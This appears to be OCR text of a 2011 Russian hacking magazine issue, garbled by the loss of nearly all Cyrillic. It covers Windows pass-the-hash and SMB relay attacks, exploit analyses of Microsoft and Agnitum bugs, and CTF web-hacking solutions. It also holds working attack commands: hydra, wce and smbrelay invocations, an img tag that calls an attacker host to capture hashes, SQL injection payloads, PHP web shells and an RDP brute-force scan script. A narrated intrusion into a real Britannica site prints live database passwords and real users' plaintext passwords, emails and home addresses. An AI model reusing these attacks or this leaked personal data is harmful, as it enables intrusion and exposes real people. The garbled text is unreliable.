() . .
, , , . , , .
, ,
. , , -

044

, . , .
100%- .
,
. , , ,

. , , ,
, . ,
, ,
. ,
.
, .
exploit-db vupen, Canvas Core
Impact. . Metasploit
meterpreter .
, ?
X 03 /146/ 2011

,

.
,
cain . LM-
(, ),
.

.
, LM
, , , .
,
. ,
.
, .
? , , ,
. ( )
. ,
.
?
, ,
, ,
. , ,
Adm391. ,
, . ,
,
.
, (,
IP-), .

-.
john.ini john.ini.bak ( ) :
john.ini
[List.Rules:Wordlist]
$[0-9]
$[0-9] $[0-9]
$[0-9] $[0-9] $[0-9]


. : {0,1,2,3,4,5,6,7,8,9}.
.
pentest.wordlist
Adm

:
X 03 /146/ 2011



john-386.exe wordlist=pentest.wordlist
rules stdout > pentest.passes

. :
hydra l <_> -P passwords.
txt -m L 192.168.120.11 smbnt

L,
,
. ,
. , , .
.

. . , ,
,
.

? , ...
-? ,
.
, ,
,
.
: , ? .

.
Cached Domain Credentials.
, , LM NTLM .
, .
CachedLogonsCount
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows NT\Current Version\Winlogon.

. ,
.
, Cain PWDumpX.
,
.

HTTP://WWW
links

LM-

:
en.wikipedia.org/wiki/
LM_hash;


Windows: support.microsoft.com/
kb/913485;
pokehashball: grutz.jingojango.net/exploits/
pokehashball.html;
,
,

pass-the-hash: darknet.org.uk/2010/10/
windows-credentialseditor-v1-0-list-addedit-logon-sessions;

Microsoft
SMB Relay:
microsoft.com/technet/security/bulletin/
ms08-068.mspx;
SMB signing:
support.microsoft.
com/kb/887429;
SmbRelay3

: htarasco.
org/security/smbrelay.

045

Cain, Cracker
MS-Cache Hashes. , .
,
.
, , , ,
. , ,
. ,
, , ,
.
Extreme GPU Bruteforcer,
, , , .
-, .

! lamercomp pokehashball.

, .
. <Send>
.
pokehashball.
.
NTLM- LM-.
. (, ,
). NTLMv2-, , , .

. , .
: , 100% .
. , ,
:
, ,
!

, , ,
.
, ,
.
, , HTML Outlook IE.
IE .
, , . ,
, , . IE (
, Outlook) web-.
.
, ,
. web-,
.
pokehashball.
Ruby Metasploit.
, , Metasploit
RUBYLIB=C:\
framework\msf3\lib.
Outlook Express. ,
Outlook ; .
Outlook Express , , . ?
HTML- :
Hacker,<br />m0r0 Corporation <img width=1 height=1
src="http://lamercomp:8088/d.gif" />

Outlook ,
,
.

046

, , .
.
, .
Single Sign-On. ,
, .
, Microsoft.
, ,
CRM . ,
, .
, ,
, LM NTLM. :
, ,
,
.
pass-the-hash. ,
. .
, .
, , ,
, . wce,
,
.
X 03 /146/ 2011

.
, .
,
.
.
,
:
wce.exe r60 o c:\temp\wce.log

r60
60 .

LSASS. LocalSystem.
psexec
s. .
,
. .
,
, .
,
, .
, Microsoft
. , , . ,
, ,
wce, . ,
, .
, ,
LocalSystem (
), .
. , .
.
:
wce.bat
@echo off
c:\temp\wce.exe -o c:\wce.log

.
.
HKEY_
LOCAL_MACHINE\Software\Microsoft\Windows\Current
Version\Run.
, . ,
X 03 /146/ 2011


, , ,
. ,
c:\wce.log.

INFO

wce s <, > -c cmd

, , ,
.
, , ,
LM- NTLM-,
. , ,
challenge,
.
SMB Relay.
Microsoft .
(, NT) - MS08-068. , .

.
SMB.
,
EnableSecuritySignature RequireSecuritySignature
HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\LanManServer\
Parameters. ,
Windows 2000 RequireSecuritySignature
,
.
.

smb_relay Metasploit.
, ,
smb_relay:

info

,
,
.
.



.

DVD
dvd

,

,

.

use windows/smb/smb_relay
set smbhost <ip- >
exploit

047


? . , , 445 SMB. , , . regedit TransportBindName HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
. .
! -
,
, meterpreter , . , ?
, ?
. : . meterpreter .

Help, I need somebody

. ,
. , ?
, . -
. ,
Metasploit , 445
, , .

, - .
,
, HTTP. web-

. SMB, , .
. , - . , Metasploit smb_relay
, SMB.

048

smbrelay3. , .
, :
smbrelay3.exe --ListForHTTPRequests
--AlternativeSrcPort 8088 --SMBDestinationHost
<lamercomp>

[+] *** Remote SmbRelay3 BindShell Service Running


***: (< IP>:8080),

8080.
net user .

,
, 9 10 :
!. ,
.
, , ,
.
, .
pass-the-hash
, . , .
, Microsoft ,
, .
: ,

. ,
][. z
X 03 /146/ 2011


, CISS Research Team, twitter.com/NTarakanov

Microsoft
: Windows (EnableEUDC),
,
, ,
.
, :
21- PoC, FTP-, IIS 7.5;
22- wooyun.org ActiveX' WMI Administrative
Tools;
27- , rgod, PoC Fax
Cover Page Editor;
4- metasploit
, POC2010;
5- Google Internet Explorer'e.
Security Research &
Defense, , Workaround
(CVE-2010-3970) ACL-
shimgvw.dll.
Microsoft ,
DoS only,
.
FTP(CVE-2010-3972): MS , ,
(0xFF ),
!
,
EIP.

, .
(Insecure Library Loading Backup Managere'e)
, Vista.
MDAC,

Pwn2Own. .

050

01


MICROSOFT DATA ACCESS
COMPONENTS

TARGETS: Windows XP, 2003, Vista, 2008, 7


BRIEF

Integer Overflow, , ,
heap'a CacheSize
ActiveX MSADO.
CacheSize RecordSet
,
. CacheSize
, ,
4, DWORD 4 :
msado.dll
.text:4DDFC348 lea
eax, ds:4[eax*4]
; eax CacheSize
.text:4DDFC34F push
eax
.text:4DDFC350 push
0A00000h
.text:4DDFC355 push
?g_hHeapHandle@@3PAXA
; void * g_hHeapHandle
.text:4DDFC35B call
ds:__imp__MpHeapAlloc
;

, ,
CacheSize 0x40000000, ,
, .
. -,
? XML Data
Island, , XML, html-, :
X 03 /146/ 2011

0x21212121 EIP :)



<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<HereIsCouldBeAnyData />
</Device>
</Devices>
</XML>

-, , -
? RecordSet:
MoveFirst, MoveNext . ,
, .

ASLR.
:
: ;
, heap'e,
2 0x00 ;
C++, DWORD -
.

, JavaScript
, 0x0000.
0x0000, 0x00010001. :
-
. ,
, :
X 03 /146/ 2011

function IncreaseRowCounter()
{
if(GlobalRowCounter < 0x10120)
{
for(i = 0; i < 0x300; i++)
{
GlobalRowCounter++;
localxmlid2.AddNew(["BBBB"], ["c"]);
localxmlid2.Delete();
}
var percentcomplete = Math.round(
GlobalRowCounter /0x10120 * 100);
document.getElementById(
'progressfaseone').innerText =
percentcomplete + "%";
window.setTimeout(IncreaseRowCounter, 100);
}
}

, :
(
ASLR), DEP ROP-. Mso.dll
VirtualProtect,
, - Executable.
use-after-free (CVE-2010-1262)
ms10-035. , !
,
.
SOLUTION

ms11-002: microsoft.com/technet/security/Bulletin/MS11002.mspx

051

- ATL- VirtualProtect

4,

02


MICROSOFT GRAPHICS RENDERING
ENGINE

TARGETS: Windows XP, 2003, Vista

.text:5D020200
.text:5D020201

push
call

eax
; int
_CreateSizedDIBSECTION@28

CreateSizedDIBSECTION biClrUsed
(signed). :
.text:5D01FC2D loc_5D01FC2D:

BRIEF

Windows
. POC2010 &
,
! ,Explorer -, : ,
,
( , doc- pdf-)
, .

ConvertDIBSECTIONToThumbnail shimgvw.
dll, , ,
CreateSizedDIBSECTION.
.text:5D0201F5
.text:5D0201F6
.text:5D0201F7
.text:5D0201FA
.text:5D0201FB
.text:5D0201FC
.text:5D0201FD

052

push
push
push
push
push
push
lea

edx
; int
ecx
; int
[ebp+arg_8] ; int
esi
; int
ecx
; HPALETTE
eax
; int
eax, [ebp+var_10]

.text:5D01FC2D cmp
ecx, 100h
; ecx biClrUsed
.text:5D01FC33 jg
loc_5D01FCF0
; !!!
.text:5D01FC39 lea
esi, [edx+28h]
.text:5D01FC3C lea
edi, [ebp+var_430.bmiColors]
.text:5D01FC42 rep movsd ; inline memcpy

, ecx ,
, , . ,
WebDav Internet Explorer.
: ,
.
Explorer.exe, Windows XP,
Explorer.exe DEP permanent. -
ROP- DEP,
SetProcessDEPPolicy VirtualAlloc c RWX .
X 03 /146/ 2011

metasploit'a:
#
'imp_VirtualAlloc',
'call [ecx] / pop ebp / ret 0x10',
0,
0x1000,
#
0x3000,
#
0x40,
# RWX

SOLUTION

MS, Fixit-. DLL


: echo y| cacls %WINDIR%\SYSTEM32\shimgvw.dll /E

.text:0002B850
.text:0002B850
.text:0002B851
.text:0002B852
.text:0002B856
.text:0002B859
.text:0002B85C
.text:0002B85F
.text:0002B862
.text:0002B866
.text:0002B86D
.text:0002B870
.text:0002B873
.text:0002B879
.text:0002B87C
.text:0002B885

/P everyone:N

03


AGNITUM OUTPOST SECURITY
SUITE PRO

TARGETS:

Agnitum Outpost Security Suite Pro Agnitum, VBEngNT.sys


BRIEF

: HIPS-
, .
DLL . Handle
\\.\vbengnt Guest
ioctl-
,
. , ioctl-
, -
.
, dll 50 - 50.

,
. .
Ioctl \\.\vbengnt
.text:0002B850 ioctl_handler
X 03 /146/ 2011

proc

Irp = dword ptr 8


push
esi
push
edi
mov
edi, [esp+8+Irp]
mov
eax, [edi+60h]
mov
ecx, [eax+4]
mov
esi, [eax+8]
mov
edx, [edi+0Ch]
mov
[esp+8+Irp], ecx
mov
dword ptr [edi+1Ch], 0
movzx ecx, byte ptr [eax]
sub
ecx, 0
jz
loc_2B97D
sub
ecx, 2
jz
loc_2B967
jz
short loc_2B8A0
; ecx == 0x0E (IOCTL)

Ioctl- :
.text:0002B8A0 loc_2B8A0:
.text:0002B8A0
mov
eax, [eax+0Ch]
.text:0002B8A3
mov
ecx, eax
; eax IoCtl
.text:0002B8A5
shr
ecx, 2
and
ecx, 0F00h
.text:0002B8A8
cmp
ecx, 800h
.text:0002B8AE
.text:0002B8B4
jz
short loc_2B8CD
[..]
.text:0002B8CD loc_2B8CD:
.text:0002B8CD
lea
.text:0002B8D1
push
.text:0002B8D2
push
.text:0002B8D3
push
.text:0002B8D4
push
.text:0002B8D5
call

ecx, [esp+8+Irp]
ecx
esi
edx
eax
vuln_function

0x0001DAA0 :
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0

vuln_function proc near


arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h

053

.text:0001DAA0
.text:0001DAA0
.text:0001DAA4
.text:0001DAA7
.text:0001DAA8
.text:0001DAAC
.text:0001DAAE
.text:0001DAB3
.text:0001DAB6
.text:0001DABC

.text:0001DC03
mov
shr
push
mov
mov
and
cmp
mov
jb

eax, [esp+arg_0]
eax, 2
edi
edi, [esp+4+arg_C]
ecx, [edi]
eax, 0FFh
eax, 32h
dword ptr [edi], 0
short loc_1DAC7

call

ENGINE_XmlMsgEmpty

[..]
.text:0001D200 ENGINE_XmlMsgEmpty proc near
.text:0001D200 arg_0 = dword ptr 4
.text:0001D200
.text:0001D200 push
esi
.text:0001D201 mov
esi, [esp+4+arg_0]
.text:0001D205 test
esi, esi
.text:0001D207 jnz
short loc_1D212

[..]
[..]
.text:0001DAC7 loc_1DAC7:
.text:0001DAC7 mov
edx, [esp+4+arg_8]
.text:0001DACB cmp
edx, dword_45418[eax*4]
;
.text:0001DAD2 jz
short loc_1DADD

.text:0001D218
add
esi, 14h
; esi
.text:0001D21B
.text:0001D21C

push
call

esi
sub_37650

[..]
.text:0001DAEB loc_1DAEB:
.text:0001DAEB cmp
eax, 31h
; switch 50 cases
.text:0001DAEE push
esi
.text:0001DAEF ja
loc_1E186
; default
.text:0001DAEF
; jumptable 0001DAF5 case 3
.text:0001DAF5 jmp
ds:off_1E190[eax*4]
;

, ENGINE_XmlMsgEmpty
:
.text:0001DBFC
.text:0001DC00
; esi
.text:0001DC02

.text:00037650 sub_37650
proc near
.text:00037650 arg_0 = dword ptr 4
.text:00037650
.text:00037650 mov
eax, [esp+arg_0]
.text:00037654 mov
dword ptr [eax+14h], 0
; 0x00000000
.text:0003765B mov
dword ptr [eax+20h], 1
.text:00037662 add
eax, 28h
.text:00037665 mov
[esp+arg_0], eax
.text:00037669 jmp
nullsub_1
.text:00037669 sub_37650
endp

mov
mov

esi, [esp+8+arg_4]
eax, [esi]

SOLUTION

push

eax


HIPS. z

Handle!

054
54

X 03 /146/ 2011


M4g icq 884888, snipper.ru


,
17681771 . 1995 ,
.

,
.

, ab
ovo, ,
britannica.com ( eb.com). ,
, Blog
britannica.com/blogs. ,
,
:
<meta name="generator" content="WordPress 2.2" />

, ,
:

056

, , .
, , : inurl:britannica.
com filetype:php.
, .

,
.
,
:
britannica.com/blogs/?author=[N] ([N] ID
X 03 /146/ 2011

INFO

info

WordPress


) .
ID, ,
:
admin, mlevy, dhoiberg,
jluebering, jhennelly,
whosch, kkuiper, tpappas,
rmchenry, gmcnamee, rhorrow,
tom, bcosgrave, tgallagher,
rmurraythomas, jennifer,
ksparks, aguttmann,
jmaguire, rwilson

,
:).
X-Tools WBF.Gold (wonted.ru/programms/
wbf-gold).
:
/ : http://www.
britannica.com/blogs/wp-login.php
: POST
Submit-: Name=wp-submit,
Value=Login
:
""=log, ""=pwd
: input type="password"


insidepro.com/rus/download.shtml

. - ,
mlevy
London :).
, .

, britannica.com/blogs/wp-admin , mlevy X 03 /146/ 2011

,
Plugins.
,
akismet/akismet.php -.
.
(britannica.com/
blogs/?britan)
- (/apps/docs):
account-443
account-80
benandbella
bindia
blog.qa.tar.bz2
catalog
category-template.php
contributor
corporate-80
dead.letter
deprecated_site_pages-80
dev-blog-wp22.zip
failover
form01-80
forms01-80
gcoop-80
help-80
httpd-advocacy
httpd-safe-443
https-199
....
wordpress-blog-80
wppingback-80
www-80



:
1.

.
2.



.
3.

(apache
)

.
4.
,



.

HTTP://WWW
links


: britannica.
com/blogs;

: britan nicaindia.com;
(-
- WSO:
, , ,
https://rdot.org/
):
forum/showthread.
php?t=1085.
/apps/docs/wordpress-blog-80/blogs/
wp-config.php:
define('DB_NAME', 'blogs'); // The name of
the database
define('DB_USER', 'wordpress'); // Your

057


MySQL username
define('DB_PASSWORD', 'gutenberg5!'); // ...and
password
define('DB_HOST', 'blogs.db'); // 99% chance you
won't need to change this value
/apps/docs/bindia/codelibrary/inc/connection.php:
$dbConn = pg_pconnect("host=bi.db port=5432 dbname=bi
user=bi password=bi");

e-mail',
( ,
: ),
WSO -, PostgreSQL.

bi.db,
: postgres, ihop, bi, aasl, site,
ebtimeline, bil.
tbl_order_master, :
order_id
order_number
order_date
uid
order_status
bill_name
bill_address
bill_phone
bill_email
ship_name
ship_address
shipp_phone
shipping_chrages

058

:
: 55-56, Udyog Vihar, Gurgaion Phase IV,
Gurgaon, Gurgaon, India
: 9810040499
E-mail: kaushik@britannicain.com
A : 55-56, Udyog Vihar, Gurgaion Phase IV

britannicain.com (, , )
, bi Britannica India. ,
, ,
britannicaindia.com /apps/
docs/bindia .
britannicaindia.com
Encyclopaedia
Britannica ( CD/DVD),
.
, ,
,
ReverseIP- yougetsignal.
com/tools/web-sites-on-web-server:
advocacy.britannica.com
benandbella.eb.com
britannicaindia.com
corporate.britannica.com
corporate.eb.com
forms01.britannica.com
help.eb.com
info.eb.com
newsletter.eb.com
newsletters.britannica.com
partners.britannica.com
sales.britannica.com
statistics.eb.com
store.britannicaindia.com
X 03 /146/ 2011


support.britannica.com
universal.eb.com
www.apps.eb.com
www.britannicaindia.com

, - .
, :).

tbl_register, 9 470 . : ,
-
( ,
).
:
Honie:rose:harpritkaur@hotmail.com:D-6/13, Vasant
Vihar
ritesh:rockrover:riteshroxy@yahoo.com:sun power flats
g block s.f.-4 memnagar
pioneer:pravyogi:pravin_hande@rediffmail.com:bhau
daji road
ganguly:goa@calcutta:ganguly_sumam@yahoo.com:24, ali
chirag lane,
muthana:pretty:muthana@vsnl.com:12 Sarat Chatterjee
Avenue
anurup:mitali:anurup_m@vsnl.com:Surasree 24A, Lake
View Road
superbat393:scurvycur:superbat_393@yhaoo.
co.uk:12,T.S.Krishna nagar extn,mogappair
SuyashAnand:999999999:suyashanand@yahoo.com:xyz
champakali:mypczenith:bbsr@lnsel.com:cuttack
sim00:7020557:sim00@rediffmail.com:125 sainik vihar
arka:arkaarka:kaaraak@yahoo.com:catia
anilpost:bathinda:anilpost@hotmail.com:2242, urban
estate phase-ii
k_dasgupta:mampu:k_dasgupta@hotmail.com:PO Box 72
madhu:rama:ureply@rediffmail.com:6576
satyajitpani:silusilu:satyajit_pani@msn.com:cuttack
chandi cuttack
ramkishore:bansal123:ramkishore@vsnl.com:235, Katra
Peran, Tilak Bazar
rjana:1234:rjana@vsnl.net:haldia
rakov2000:rakov2000:xaldinx@gmail.com:&3/2, Krishna
Nagar
padma:suhana:padma@ebindia.com:B-2/171, Sfdarjang
Enclave
manish:purohit:manish@manishpurohit.com:d-77
X 03 /146/ 2011


Panchsheel Enclave
thomas:thomas:thomas@britannicain.com:l-86 madangir
RajuV:plsGOD:vraju3@emirates.net.ae:AYDJA PO BOX 25
vikram:krishnaaa:vikram@britannicain.com:c-266,sarita
vihar


SELECT username||chr(58)||password||chr(58)||email||c
hr(58)||address FROM tbl_register LIMIT 30 OFFSET 0.
britannicaindia.
com/registration.php
vinay_75a;13041974, , , .
,

:). ,
.

PostgreSQL
.
, bil users
:
gabie;springsprung
tea;tea
mwiechec;password
sabis123!;sabisimages
erc123!;ercimages
kossuth;kossuth123!

, , - ReverseIP-.

,
, ,
.

-,
. ,
, -...
:). z

059


, Digital Security (twitter.com/asintsov)


, .
, ,
. , 0day-...

, , , . ,
.
. ,
. ,
, .
: DLL-Hijacking, ARP-POISONING, SMB
RELAY... ,
libc, LD_AUDIT (
). , .
.

060

. -
. .
. ,
.
, . ,
: ? ,
.
, , . ,
, .
X 03 /146/ 2011

CONFidene 2010(2):
, ,
: .
? ? ,
, ! ,
! ,
. - .
- . ,
/
. .
, , .
90%
. , ,
-
.
, ,
. ,
, ,
, , .
,
( , , ). ,
,
.
.
, , . NTLM,
.
,
, . ,
, ,
.
,
?
,
,
. ,
, ,
, ,
.
, , ,
. ,
, . X 03 /146/ 2011

, , ,
. , .
: , ,
, ,
<>, , . : , , ,
,
.
, (
). , :
:
select logins, FIO from db;

, , :
select * from db;

. , , .

...

061


, db
, ,
.
, ,
? ...

OpenEdge

, , .
RDBMS Progress OpenEdge. ?
, :

PepsiCo
Coca-Cola
Johnson & Johnson
Lockheed Martin
McDonnell-Douglas
Sony
Danon
Mercedes-Benz
Ford Motor
Mazda Motor Corporation
Heineken
...

, , ,
:). . ,
sh2kerr ( Yandex)
. :

062

,
. sh2kerr ,
. ... ! . , , ,
, - .
,
. . : ?
, ?. ,
. ? ,
, . OpenEdge,
, .
.
, , , , .
. _Users, ,
Admin, ,
TCP- .
. ... ?
? OllyDbg.

What the heck?

, .
OllyDbg ImmunityDebugger
OpenEdge prowin32.exe. , . recv(), , ,
. ,
WS2_32.dll, X 03 /146/ 2011


. :
-, Search for -> Name in all modules.

recv , recv WSOCK32.dll.
. <F9> (Run)
. recv.
, , (
prow32.dll) .
recv prow32.dll,
<F8>, , , recv (ESP+4 , ). <F8> <F9>,
. ,
:
(. ). <F9> ,
memmove, ,
,
.
, , :
CMP

. , - .
DLL' :).
. ,
, :

AL,BYTE PTR DS:[EDX]

AL EDX, ( , ,
). , , ECX EDX
, .
prow32.dll dbut_stcomp().
,
. , 0.
, . ,
EAX dbut_stcomp.
, EAX , RETN EAX , ,
.
TEST
JE
MOV
MOV
PUSH
PUSH
CALL

: , , ? ?
?
: , . - ?
: ? , !
: ... ,
XXX! , ?
: ! !
! , -!
: , !

AL,BYTE PTR DS:[ECX]

ECX , AL ,
. , :
MOV

, ,
EAX JE JNE.
, , , :
prow32.1024653F. <F9> : ,
.
.
, , ,
...
, :

EAX,EAX
SHORT prow32.1024653F
ECX,DWORD PTR DS:[106D1FF4]
EDX,DWORD PTR DS:[ECX+B0]
EDX
2C6
prow32.10026CA0 ;

, <F9>
.
X 03 /146/ 2011

: , , ? ?
?
: , . - ?
: ? 043 , 043!
: ... , ,
043...
: ! !
043 ...
: 043, ...!

, .
: , , ,
-. . n- .
:
. .

Kaspersky AV 1000day

, ,
.
.

, ,
. ,
aka GreenDog ( ...)

063


, ,
: ,
? Cain.
Oracle TNS (, , ),
Passwords -> SMB
, ,
X NTLM-
, - . Kasper.
,
( , SMB,
SMB2, Cain ).
?
, Google . , ,
.
,
. - ,
, ,
. , ,
. Kaspersky Administration
Kit 6/8 IP-. ,
ICMP-.
SMB,
, , . ,
NTLM-. ,
, ,
.
smb_relay- Metasploit,
Y .
Y NT AUTHORITY/SYSTEM.
, ?

064

1. Microsoft Active Directory.


2. Administration Kit.
3. Administration Kit IP-.
!

X 03 /146/ 2011

Windows-

.
,
,
. ,
, BackTrack,
smb_relay.
NTLM-
( X, ).
, Y
. Y NTLM-Response , X. X ,
.
smb_relay Y ,
, Y
, . , , , meterpreter. Y (
, , , ).
Windows,
(
).
NTLM .
. IP- +
(NTLM) .

,

. . ,
,
.
- ,
, .
, , +
, , .
may the force be with you... z
X 03 /146/ 2011


, Positive Technologies (devteev.blogspot.com)
, Positive Technologies (ptresearch.blogspot.com)
oxdef , (blog.oxdef.info)

HackQuest 2010


-,
Chaos Constructions 2010,
online SecurityLab.
HackQuest 2010 ,
, : webhacking, social engineering, reverse engineering .
-
. ()
() ,
:). ,
, HackQuest 2010 .

.

1:

.
,
MySQL
SQL (insert-based).
, mod_security
. SQL- :

066

$query = "INSERT INTO indexes (text,source) value


('".$_GET['text']."',".$_GET['action'].")";

,
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2b(s
elect+1+from(select+count(*),concat((select+user()+fr
om+information_schema.tables+limit+0,1),0x3a,floor(ra
nd(0)*2))x+from+information_schema.tables+group+by+x)
a)*/,0)--+

, -
. ?
1. /*!...sql-...*/, SQL-
mod_security, (. devteev.
blogspot.com/2009/10/sql-injection-waf.html).
2. + (%2b) ( . https://rdot.org/forum/showthread.php?t=60).
3.
(. qwazar.ru/?p=7):
X 03 /146/ 2011

SQL Injection
, SQL Injection
Local File Including

Remote File
Including
old-school
+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)*/,0)--+
...

admins.

Path Traversal
select 1 from(select count(*),concat((select
user()),0x3a,floor(rand(0)*2))x from information_
schema.tables group by x)a

4. SQL
,0),
. -,
+ ( HTTP GET- ).
,
. MySQL 5.x ,
information_schema,
. ,
SQL Injection
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2
b(select+1+from(select+count(*),concat((select+tab
le_name+from+information_schema.tables+where+table_
schema!='information_schema'+and+table_schema!='mysql'
X 03 /146/ 2011

http://172.16.0.2/search.php?action=0&text=1'/*!%2b
(select+1+from(select+count(*),concat((select+colu
mn_name+from+information_schema.columns+where+table_n
ame='admins'+limit+1,1),0x3a,floor(rand(0)*2))
x+from+information_schema.columns+group+by+x)a)*/,0)-+
http://172.16.0.2/search.php?action=0&text=1'/*!%2b
(select+1+from(select+count(*),concat((select+colu
mn_name+from+information_schema.columns+where+table_n
ame='admins'+limit+2,1),0x3a,floor(rand(0)*2))
x+from+information_schema.columns+group+by+x)a)*/,0)-+

login password admins.


http://172.16.0.2/search.php?action=0&text=1'/*!%2b(s
elect+1+from(select+count(*),concat((select+concat_ws
(0x3a,login,password)+from+admins+limit+0,1),0x3a,flo
or(rand(0)*2))x+from+admins+group+by+x)a)*/,0)--+

admins ( MD5- ).
MD5- .
MD5- (,
xmd5.org).
,
- :).
robots.txt,
-.
,
Remote File Including (RFI).
-

067

LFI over /var/mail

XSS
pdf- flash-
hr(109)||chr(115)||chr(117)||chr(115)||chr(101)||chr(
114)||chr(115)+limit+1+offset+1)::text::int--

SuEXEC
-
. ,
PHP. ,
: <?php passthru($_
REQUEST['c']);?>.

RSA- , , RSA-,
SSH
.
SQLi->RFI->RSA .

2:

, , -,
SMS-.
SQL (selection-based)
PostgreSQL:
http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=cast(version()+as+numeric)


. , , -,
, -, . information_schema MySQL
5.x, :
http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=1;select(select+table_name+from+information_
schema.tables+limit+1+offset+0)::text::int-http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=1;select(select+table_name+from+information_
schema.tables+limit+1+offset+105)::text::int--

vsmsusers.
http://172.16.0.4/index.php?r=recovery&name=1&email=1&
status=1;select+(select+column_name+from+information_
schema.columns+where+table_name=chr(118)||chr(115)||c

068

login password vsmsusers.


,
, ,
(,

).
, ,
File Including (
Local File Including/LFI).
, , ,
, include().
PHP - (. raz0r.name/
releases/mega-reliz-samyj-korotkij-shell):
http://172.16.0.4/index.php?u=LV89284&p=data:,<?=@`$c
`?>&c=ls

?
1. stream wrappers (data PHP
5.2.0);

2. short_open_tag register_globals ON;


3. <?= ?> <? echo ?>;
4.
shell_exec().

, (/
etc/passwd). , telnet (, THC-Hydra, Medusa,
ncrack),
.
, ,
. telnet
.

3:
-

-,
.
-,
- (path
X 03 /146/ 2011

-
pdf
traversal).

(
online- securitylab.ru/hq2010/list.php).
- : GET /../../../root/.history HTTP/1.1.
, .

4:

-, .
(
index.bak)
, :

, IP-
( blacklist.php). ,
-
HTTP_X_FORWARDED_FOR, ,
, IP-
X-Forwarded-For (
CuteNews).

X-Forwarded-For - : ';?><?eval($_
GET['cmd']);?><?$a='.
, , , .

5: Cross-Site Scripting

XSS (,
, :)), XSS, DOM-based XSS (. owasp.
org/index.php/DOM_Based_XSS).
2005 , (. webappsec.org/projects/articles/071105.
shtml). , XSS ,
-
DOM -
JavaScript-. HTTP-
! :
...
Select your language:
<select><script>
document.write("<OPTION value=1>"+document.
location.href.substring(document.location.href.
indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script></select>

JavaScript-
default :
X 03 /146/ 2011

,
http://www.some.site/page.html#default=<script>alert(
document.cookie)</script>

, -
JavaScript- url- ,

. , , ,
. -
( ) Cross-Site Scripting .
. .
HTML- .
:
...
</div>
<script>
document.write(unescape('%3Cimg%20src%3D%22/img/stat.
png?site='+document.location.href+'%22%3E'));
</script>
</div>
</body>
</html>


, , , .
:
1. .
2. ,
JavaScript- (,
).
3. , .
4. , .
5. Profit!

069


RAZ0R HTTP://RAZ0R.NAME

1.
vasya.cc10.site:
echo Options +FollowSymLinks > /usr/local/www/data/
vasya/.htaccess

2. , : ln -s /usr/local/www/data/root/.htaccess /
usr/local/www/data/vasya/test.txt

3. ,
r00t.cc10.site: ln -s /usr/local/
www/data/root/.htpasswd_new /usr/local/www/data/
vasya/passwd.txt

4. MD5- (, PasswordsPro John the Ripper)


5. r00t.cc10.site
HTML-

6:

,
, -
Apache 80- ,
SMTP- DNS-. ,
-, DNS-.
? DNS-, .
DNS-, -: dig
@172.16.0.10 PTR 10.0.16.172.in-addr.arpa
DNS-: dig @172.16.0.10 cc10.site axfr
DNS (
hosts).
Local File Including
.
SMTP-
(. xakep.ru/post/49508/default.asp). , :
telnet 172.16.0.10 25
ehlo cc10.site
mail from:any@cc10.site
rcpt to:vasya
data
<?php passthru($_GET['cmd']);?>
.
ENTER

SMTP-,
:
http://vasya.cc10.site/index.php?file=/var/mail/
vasya%00&cmd=ls -la /

, .
SuEXEC, .

(. kernelpanik.org/docs/kernelpanik/
suexec.en.pdf). ,
-
AllowOverride All.
:

070

7: PDF

- () pdf-, -
. , pdf-
flash-.
, , , swf pdf-
zlib. swf- , , zlib Python.
- swf-.
swfdump
swftools. Obfuscate
.
, ,
:
00016)
00017)
00018)
00019)
00020)
00021)
00022)
00023)
00024)
00025)
00026)

+
+
+
+
+
+
+
+
+
+
+

0:0 getlocal_0
1:0 pushint 170
2:0 pushint 42
3:0 pushint 52
4:0 pushint 120
5:0 pushint 178
6:0 pushint 249
7:0 pushint 255
8:0 pushint 228
9:0 pushint 80
10:0 pushint 32

,
-.
, SQL.

8:


.
,
, .

- (, , , 3D-)
,

. , , -.
HTML-!
X 03 /146/ 2011

TFTP-
, -
,
HTML-. .
.
. HTML- (
, %username%, ),
.
,
HTML- ,
, .
, .
,
, 0, , ,
1. , .

ASCII-. + .
, -
, HTML- ,
.

,
, TFTP-.
, , -
.
TFTP- (69/
udp), , .
. ,
router-config,
Cisco IOS. ,

(, tftptheft)
router-config.
- , .
secret 7 (, Cain&Abel).

9: Cisco

, ,
Cisco
IOS. TCP- ,
FINGER. ,

.
TELNET cisco ( Cisco). . ,
:).
cisco .
X 03 /146/ 2011

,
. Router#show
running-config view full
, .

10: TFTP

,
( ),
HQ2010.
xakepru.habrahabr.ru/.
, HQ2010!
HQ2010, . ,
, ,
aka D0znp, .
( , ESET SecurityLab),
. -! z

071


icq 884888, http://snipper.ru

X-TOOLS
: Fast RDP Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ROleg

:
(MedWebGrasp, MWG)
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: iHornet

SQL-,
,
.
, , ,
- :
;
MySQL;

.

SQL !

- ! ,
, RDP
Fast RDP Brute! Qtss-,
RDP 5.
:
RDP 5;

( 30 120);
( 120
);
;
.



IP-. :
1.
nmap ( :
insecure.org).
2. :\Program Files\Nmap\scripts
rdp.nse (
).
3. .bat :
@echo off
for /l %%%x in (1,1,100) do (
start "rdp" /HIGH nmap -n -Pn -p
T:3389 -T5 --script rdp.nse -iR 0
)
exit

4. , , ,
:)

: frdpb.hut2.ru.

072


SQLinjection
(
all inclusive
).
:
( );


( );
( );

( );
, ( );
, ( );
( );

( );
( );
( );
( );
( ).

,

MS Access 2003! , -

, , :
1. SQL
:
http://mysite.com/show.php?id=3+uni
on+select+1,2,user(),4,5--

2. .
3. ,
.
4. (
).
5.
SQL BSQL (
),

.
6. .
7. ,
.
8.
( ) , .
9.
(
, ,

,
*****[O1] ).
10. *pass*,*pwd*,*psw*, , .
11. , ,
,
* (
).
12.
